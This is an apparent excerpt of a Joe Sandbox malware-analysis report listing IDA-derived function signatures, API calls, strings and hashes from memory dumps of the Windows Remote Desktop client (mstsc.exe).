                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleLibraryProc$CloseErrorFreeLast$CreateLoadMessageModuleProcessTracememset
                                                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 1081975220-4169039593
                                                                                                              • Opcode ID: f436f3ae58baf899528a7af43b9b74249f78b4c7bf20ac0c8954d1ccf964cb4a
                                                                                                              • Instruction ID: 957b728d7e7938b5923d61fbcd33e19ffc8dae81facf5a86d7ff142f32392b69
                                                                                                              • Opcode Fuzzy Hash: f436f3ae58baf899528a7af43b9b74249f78b4c7bf20ac0c8954d1ccf964cb4a
                                                                                                              • Instruction Fuzzy Hash: F051B372540204FBDB299FA9DC49F5A7BB5BF85324F150056E901E72E2C63EE980CB52
                                                                                                              Function 0080C070 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0080C0AE
                                                                                                              • memset.MSVCRT ref: 0080C0BD
                                                                                                              • LoadLibraryExW.KERNEL32(normaliz.dll,00000000,00000000), ref: 0080C0CC
                                                                                                              • GetProcAddress.KERNEL32(00000000,IdnToNameprepUnicode), ref: 0080C125
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0080C29B
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeProcmemset$HandleLoadMessageModuleTrace
                                                                                                              • String ID: IdnToNameprepUnicode$IdnToUnicode$normaliz.dll$xn--
                                                                                                              • API String ID: 1502259850-2742080081
                                                                                                              • Opcode ID: 9731124196740b2220699767ffd487effe67613afd29d174ceaa2e7834710a53
                                                                                                              • Instruction ID: 29c07036de5587ddbec14c0b32d9a5c81796f6afb999173230397f0a1f0d4aaa
                                                                                                              • Opcode Fuzzy Hash: 9731124196740b2220699767ffd487effe67613afd29d174ceaa2e7834710a53
                                                                                                              • Instruction Fuzzy Hash: 5251EE71240305AFDBA5AF98CC89F6B7BA9FF89314F000529FA45D21E2DB34D804DB52
                                                                                                              Function 0081618E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 280COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,?), ref: 00816230
                                                                                                              • GetLastError.KERNEL32(?,00000000,?), ref: 0081623A
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressClientErrorFreeHandleLastLibraryMessageModuleProcRectTrace
                                                                                                              • String ID: (
                                                                                                              • API String ID: 3483488408-3887548279
                                                                                                              • Opcode ID: a8f6416c3ed64b1286a77e0376a56ee35db95f15f8739f2d9f54866606e69579
                                                                                                              • Instruction ID: d52b894bad14480284b051ca97d0f8e94c842425a3131f579b72b0a420e2eebb
                                                                                                              • Opcode Fuzzy Hash: a8f6416c3ed64b1286a77e0376a56ee35db95f15f8739f2d9f54866606e69579
                                                                                                              • Instruction Fuzzy Hash: 3AA19E71104300AFDB29DF68D889F5A7BAAFF48324F15095DF984C71A1E738D894CB86
                                                                                                              Function 007FB175 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CredReadDomainCredentialsW.ADVAPI32(?,00000000,?,?,?,?,7FFFFFFE,000000FC,000000FC,00000001), ref: 007FB2A5
                                                                                                              • CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 007FB340
                                                                                                              • GetLastError.KERNEL32 ref: 007FB34A
                                                                                                              • CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 007FB3BB
                                                                                                              • GetLastError.KERNEL32 ref: 007FB3C5
                                                                                                              • GetLastError.KERNEL32 ref: 007FB2AF
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 007A718E: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000A,0079A670,00000004,007D428A,0000000A,00000000,00000000,00000000,00000000,0000000A,?,007D428A), ref: 007A71E2
                                                                                                              • CredFree.ADVAPI32(?), ref: 007FB437
                                                                                                              Strings
                                                                                                              • CredReadDomainCredentials failed, xrefs: 007FB304
                                                                                                              • CredDelete for canonical name failed, xrefs: 007FB397
                                                                                                              • CredDelete failed, xrefs: 007FB406
                                                                                                              • StringCchCopy, xrefs: 007FB221
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cred$ErrorLast$DeleteFree$AddressCredentialsDomainHandleLibraryMessageModuleProcReadTrace
                                                                                                              • String ID: CredDelete failed$CredDelete for canonical name failed$CredReadDomainCredentials failed$StringCchCopy
                                                                                                              • API String ID: 163554739-145328787
                                                                                                              • Opcode ID: 1eac364a10442f85ba16e48719f77028506d5b027bd9a4afe5f135c5e3f05715
                                                                                                              • Instruction ID: 15078adca2eedbd87ab676ed4a5576962ed9bf279936dd9c58d19774f6f18734
                                                                                                              • Opcode Fuzzy Hash: 1eac364a10442f85ba16e48719f77028506d5b027bd9a4afe5f135c5e3f05715
                                                                                                              • Instruction Fuzzy Hash: 0071F171A4025CABDB249F59DD88FB97BA5FF04310F2501AAEA04E72A2D738CD44DF91
                                                                                                              Function 007A9070 Relevance: 18.1, APIs: 12, Instructions: 102windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 007A907A
                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 007AC1A6
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 007AC1B6
                                                                                                              • GetStockObject.GDI32(00000005), ref: 007AC1BE
                                                                                                              • GetDlgItem.USER32(?,00003393), ref: 007AC1CC
                                                                                                              • SetTextColor.GDI32(?,00993300), ref: 007AC1DD
                                                                                                              • GetDlgItem.USER32(?,00003394), ref: 007AC1E9
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 007AC1F7
                                                                                                              • GetClientRect.USER32(?,?), ref: 007AC20D
                                                                                                              • CreateSolidBrush.GDI32(00FFFFFF), ref: 007AC218
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 007AC220
                                                                                                              • PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 007AC236
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ColorItemObjectTextWindow$BrushClientCreateLongModeProcRectSelectSolidStock
                                                                                                              • String ID:
                                                                                                              • API String ID: 1340860875-0
                                                                                                              • Opcode ID: e92a83d8371f68b46fd2637fb04e5bc1c37a2f91fecff6dbe2221d4d7b21c9c3
                                                                                                              • Instruction ID: 95e92f64fc7cdb4b2f2b4cbf2d67232f0cd1e380ca1c68e7cf31faa4a961a4b0
                                                                                                              • Opcode Fuzzy Hash: e92a83d8371f68b46fd2637fb04e5bc1c37a2f91fecff6dbe2221d4d7b21c9c3
                                                                                                              • Instruction Fuzzy Hash: 3B31B176200308BBDB029FBCED4DFAA7B69FF85710F400121F606E61E1DA759A118BA1
                                                                                                              Function 04C22410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2806843490.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004C6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2806843490.0000000004CDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4b40000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 425f2b829a62e958a848c1683da6b57b5288d3b9a1f20e0c5410af428e5740e5
                                                                                                              • Instruction ID: 6dbea695040ce0956f49725d993c8c23d88c348f821c538077a3e2ec15df8f67
                                                                                                              • Opcode Fuzzy Hash: 425f2b829a62e958a848c1683da6b57b5288d3b9a1f20e0c5410af428e5740e5
                                                                                                              • Instruction Fuzzy Hash: 0A510671A00666AFDB30DE9CCA9087EB7FAEF44204B04C4A9E496D7641E6F4FB40D760
                                                                                                              Function 007B00D0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 362COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,0000138C), ref: 007B0197
                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 007B01F4
                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 007B0214
                                                                                                              • GetDlgItem.USER32(?,0000138C), ref: 007B0227
                                                                                                              • SetDlgItemTextW.USER32(?,0000138A,?), ref: 007B03F1
                                                                                                              • SetDlgItemTextW.USER32(?,0000138B,?), ref: 007B04C4
                                                                                                              • SetDlgItemTextW.USER32(?,00001388,?), ref: 007B02C7
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
                                                                                                                • Part of subcall function 007AF3D9: GetDC.USER32(00000000), ref: 007AF3E3
                                                                                                                • Part of subcall function 007AF3D9: GetDeviceCaps.GDI32(00000000,00000058), ref: 007AF3F2
                                                                                                                • Part of subcall function 007AF3D9: ReleaseDC.USER32(00000000,00000000), ref: 007AF3FD
                                                                                                              • SetDlgItemTextW.USER32(?,0000138D,?), ref: 007B053D
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Text$MessageMetricsSystemTrace$AddressCapsDeviceFreeHandleLibraryModuleProcRelease
                                                                                                              • String ID: 10.8
                                                                                                              • API String ID: 2392498345-1857885434
                                                                                                              • Opcode ID: d40328db2f073dc901d9977debbce77b24de1db708185deff3c2ad5547a22ad1
                                                                                                              • Instruction ID: 3973e31ca31b0dbf1993a46efb689c070051ecdcb86a4e769bdb8e344031960e
                                                                                                              • Opcode Fuzzy Hash: d40328db2f073dc901d9977debbce77b24de1db708185deff3c2ad5547a22ad1
                                                                                                              • Instruction Fuzzy Hash: B9C1AF71200304EFEB29AF68DC89FAB37A9FB48300F14455EF645871E2DB79D8558B92
                                                                                                              Function 008151C7 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 336comCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                              • CoCreateInstance.OLE32(0078A464,00000000,00000001,00789EE8,?), ref: 0081527F
                                                                                                              Strings
                                                                                                              • m_pSessionEventsDispatchImpl->Advise failed, xrefs: 008155F3
                                                                                                              • m_spOleObject->DoVerb failed, xrefs: 00815495
                                                                                                              • m_spOleObject->SetClientSite failed, xrefs: 0081542E
                                                                                                              • AdjustWindowSize failed, xrefs: 008155A5
                                                                                                              • CoCreateInstance failed, xrefs: 008152B0
                                                                                                              • m_spViewer->QueryInterface failed, xrefs: 00815312, 00815372, 008153D2
                                                                                                              • m_spViewer->Connect failed, xrefs: 00815562
                                                                                                              • m_spViewer->put_SmartSizing failed, xrefs: 008154FA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCreateFreeHandleInstanceLibraryModuleProc
                                                                                                              • String ID: AdjustWindowSize failed$CoCreateInstance failed$m_pSessionEventsDispatchImpl->Advise failed$m_spOleObject->DoVerb failed$m_spOleObject->SetClientSite failed$m_spViewer->Connect failed$m_spViewer->QueryInterface failed$m_spViewer->put_SmartSizing failed
                                                                                                              • API String ID: 3463782917-643037495
                                                                                                              • Opcode ID: e5f385d6170ed1e4c9a6cf406c8c8df543063391e3c100c4242f57bd87a9c3a2
                                                                                                              • Instruction ID: eeae2b40332f7aedc2e7517bc6dc318cf6a2d6cf41ef0d359f35a4daa477e6ef
                                                                                                              • Opcode Fuzzy Hash: e5f385d6170ed1e4c9a6cf406c8c8df543063391e3c100c4242f57bd87a9c3a2
                                                                                                              • Instruction Fuzzy Hash: 4CC18E31250A10EFDB2A9F98DC88FA63B9AFF94314F190089F501DB5B2C764DC94CB92
                                                                                                              Function 007AE0AE Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 310COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LocalFree.KERNEL32(?,?,?,00000104,00000002,000004A4,00000000,00000000,000004A4), ref: 007AE104
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$AddressHandleLibraryLocalModuleProc
                                                                                                              • String ID: Default$RemoteDesktopFolder$Root folder in current directory.
                                                                                                              • API String ID: 1449440781-1843079594
                                                                                                              • Opcode ID: b89e610b79b38fe1edfae14233203367ee77e01bdcd03df7f7044a6bfc40bf15
                                                                                                              • Instruction ID: 986775cd69834c28aac3f9c9b16ece37313d2776082beae79da3f1378a49fd84
                                                                                                              • Opcode Fuzzy Hash: b89e610b79b38fe1edfae14233203367ee77e01bdcd03df7f7044a6bfc40bf15
                                                                                                              • Instruction Fuzzy Hash: A6B1D271200240AFEB2D9F98D89DF6A3B6AFB8A304F184659F601CB1E2D77DD890D751
                                                                                                              Function 007C4062 Relevance: 15.1, APIs: 10, Instructions: 103windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(00000000,00003309), ref: 007C4078
                                                                                                              • IsDlgButtonChecked.USER32(00000000,00003310), ref: 007C4091
                                                                                                              • GetDlgItem.USER32(00000000,00003309), ref: 007C410A
                                                                                                              • EnableWindow.USER32(00000000), ref: 007C4111
                                                                                                              • SendMessageW.USER32(?,0000040A,00000001,00000000), ref: 007C4123
                                                                                                              • SendMessageW.USER32(?,00000405,00000001,?), ref: 007C4134
                                                                                                              • SendMessageW.USER32(00000000,00000400,00000000,00000000), ref: 007C4151
                                                                                                              • SendMessageW.USER32(00000000,00000405,00000001,?), ref: 007C416A
                                                                                                              • GetDlgItem.USER32(00000000,00003309), ref: 007C4180
                                                                                                              • EnableWindow.USER32(00000000), ref: 007C4187
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Item$EnableWindow$ButtonChecked
                                                                                                              • String ID:
                                                                                                              • API String ID: 1728075932-0
                                                                                                              • Opcode ID: 19abdbdb3ed7bd904a4dd95329311a78f978806cfdb37b967bfd878e8d3a5586
                                                                                                              • Instruction ID: 391a61b45a4c3bf941ce286fbdd6fc9b3f4354ffd0f9138e729374de0ff635be
                                                                                                              • Opcode Fuzzy Hash: 19abdbdb3ed7bd904a4dd95329311a78f978806cfdb37b967bfd878e8d3a5586
                                                                                                              • Instruction Fuzzy Hash: D531E131640304BBDB10EB28CC99FAABB68FB54714F14812DFB05EB1D1DB3599828BA0
                                                                                                              Function 007FD029 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 145registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,LogonMethod,00000000,00000000,?,?,?,?,00000000), ref: 007FD134
                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,AllowExplicitLogonMethod,00000000,00000000,?,00000004), ref: 007FD1B5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID: AllowExplicitLogonMethod$LogonMethod$hGPKey$isEnforcedByGP$isGPDefined$pAuthSchemes
                                                                                                              • API String ID: 3660427363-3792728693
                                                                                                              • Opcode ID: b03384df01796e43438a8c313e9b4e784097bcfd979636cf7f3a35aabc4b52ff
                                                                                                              • Instruction ID: ea9bf224190e57384bd0cd1abe46e819dceaafb1e60f546895f8884d4ea78574
                                                                                                              • Opcode Fuzzy Hash: b03384df01796e43438a8c313e9b4e784097bcfd979636cf7f3a35aabc4b52ff
                                                                                                              • Instruction Fuzzy Hash: B051D2B1540248EFEB3A9F58C888F757FA7BB40314F2140A9EA059B2A2D778CD41CB51
                                                                                                              Function 008840D2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00884148
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00798086: TraceMessage.ADVAPI32(00000000,0079A670,0000002B,007810E8,0000000D,007D433C,00000004,00000000,?,007D433C,0079A670,00000000,00000000), ref: 0079809D
                                                                                                              Strings
                                                                                                              • Failed to get module specific class name, xrefs: 008841E6
                                                                                                              • PAL_SYS_WIN32_TIMER_WNDCLASS, xrefs: 0088415F
                                                                                                              • Failed StringCchPrintf, xrefs: 0088419D
                                                                                                              • %p-%s, xrefs: 00884169
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryMessageModuleProcTracememset
                                                                                                              • String ID: %p-%s$Failed StringCchPrintf$Failed to get module specific class name$PAL_SYS_WIN32_TIMER_WNDCLASS
                                                                                                              • API String ID: 1171831687-1526586533
                                                                                                              • Opcode ID: 532b38b7caf88e4602cbef5fbfe46b97a079f0ac65e41af9f4a7868f7f101438
                                                                                                              • Instruction ID: 157749f4729b40f3c2d9016589ef54dd9092794489061db9d01cd3ea6860a3ab
                                                                                                              • Opcode Fuzzy Hash: 532b38b7caf88e4602cbef5fbfe46b97a079f0ac65e41af9f4a7868f7f101438
                                                                                                              • Instruction Fuzzy Hash: C941B432644305ABDF29FFA8AC8DF563BA6FB08314F241499F500DB1E2C779C8848B91
                                                                                                              Function 00808137 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 132libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(crypt32.dll,00000000,?,00000200,?,?,007BB96D), ref: 0080816C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00808182
                                                                                                              • GetLastError.KERNEL32(?,007BB96D), ref: 008081AE
                                                                                                                • Part of subcall function 00798010: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,00000000,Microsoft.Windows.RemoteDesktop), ref: 0079803E
                                                                                                                • Part of subcall function 00798010: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 00798050
                                                                                                                • Part of subcall function 00798010: FreeLibrary.KERNEL32(?), ref: 0079806F
                                                                                                                • Part of subcall function 00796842: TraceMessage.ADVAPI32(00000000,00000000,0000002B,007810E8,0000000B,0079A670,00000004,007D42C5,00000004,00000000,?,007D42C5,0079A670,00000000,00000000,00000000), ref: 0079685F
                                                                                                              • GetLastError.KERNEL32(?,007BB96D), ref: 00808209
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,007BB96D), ref: 00808233
                                                                                                              • GetLastError.KERNEL32(?,007BB96D), ref: 00808255
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastLibrary$AddressFreeProc$HandleLoadMessageModuleTrace
                                                                                                              • String ID: CryptUnprotectData$crypt32.dll
                                                                                                              • API String ID: 2420746477-1827663648
                                                                                                              • Opcode ID: c91ee2deab15bca28b18f2a5c81f545d8d5a5aebab90548132801eff67e20f6e
                                                                                                              • Instruction ID: f10bde26a831516d6c03ee311ed62f6049f067070f8d47a2e2ab7b9b84c8d427
                                                                                                              • Opcode Fuzzy Hash: c91ee2deab15bca28b18f2a5c81f545d8d5a5aebab90548132801eff67e20f6e
                                                                                                              • Instruction Fuzzy Hash: 4E418071240A00EFEBADAB689C4EF263A9AFB45314F250459F581C71E2DE79CC80C722
                                                                                                              Function 007EB140 Relevance: 12.5, APIs: 8, Instructions: 489COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EventActivityIdControl.ADVAPI32(00000004,?), ref: 007EB183
                                                                                                              • SetEvent.KERNEL32(?), ref: 007EB20C
                                                                                                              • EventActivityIdControl.ADVAPI32(00000002,?,?), ref: 007EB6B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2805615729.0000000000770000.00000040.80000000.00040000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.2805615729.000000000088D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.2805855639.0000000000892000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_770000_mstsc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event$ActivityControl
                                                                                                              • String ID:
                                                                                                              • API String ID: 3661690246-0
